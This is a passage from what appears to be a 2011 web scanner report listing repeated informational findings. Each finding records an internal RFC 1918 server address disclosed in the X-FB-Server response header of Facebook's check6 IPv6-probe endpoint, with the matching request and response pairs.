User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.119.65
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:18 GMT

/*1308246978,171865921*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.227. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.164.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.164.58
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:21 GMT

/*1308243561,171353146*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.228. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.223.46

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.223.46
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:07 GMT

/*1308244807,171368238*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.229. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.140.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.140.58
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:08 GMT

/*1308226508,171347002*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.230. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.37

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87ebd7cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.186.37
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:12 GMT

/*1308226512,171358757*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.231. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.154.33

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.154.33
X-Cnection: close
Date: Thu, 16 Jun 2011 12:10:00 GMT

/*1308226200,171350561*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.232. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.100.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.100.50
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:20 GMT

/*1308232400,171336754*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.233. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.34

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.27.34
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:01 GMT

/*1308248221,171318050*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.234. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.151.46

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.151.46
X-Cnection: close
Date: Thu, 16 Jun 2011 18:58:27 GMT

/*1308250707,171874094*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.235. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.120.132

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.120.132
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:30 GMT

/*1308232710,169572484*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.236. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.35.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.35.51
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:40 GMT

/*1308247600,171844403*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.237. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.203.101

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37cc8d578%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.203.101
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:23 GMT

/*1308236123,169593701*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.238. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.59.124

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.59.124
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:23 GMT

/*1308223343,169556860*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.239. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.18.52

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3816cd8fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.18.52
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:43 GMT

/*1308231163,171905588*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.240. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.52.47

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df706975%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.52.47
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:36 GMT

/*1308243876,171324463*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.241. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.169.30

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.169.30
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:40 GMT

/*1308238600,171878686*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.242. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.209.187

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.209.187
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:40 GMT

/*1308227440,169923003*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.243. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.131.124

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f0119ec8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.131.124
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:32 GMT

/*1308240152,176718716*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.244. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.167.52

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df316483ae%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.167.52
X-Cnection: close
Date: Thu, 16 Jun 2011 15:16:02 GMT

/*1308237362,171353908*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.245. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.18.46

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac8453ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.18.46
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:22 GMT

/*1308228682,171840046*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.246. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.122.33

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b6c243ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.122.33
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:53 GMT

/*1308237053,170555937*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.247. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.49

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3230385f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.190.49
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:33 GMT

/*1308245433,171359793*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.248. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.137.44.125

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6496c58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
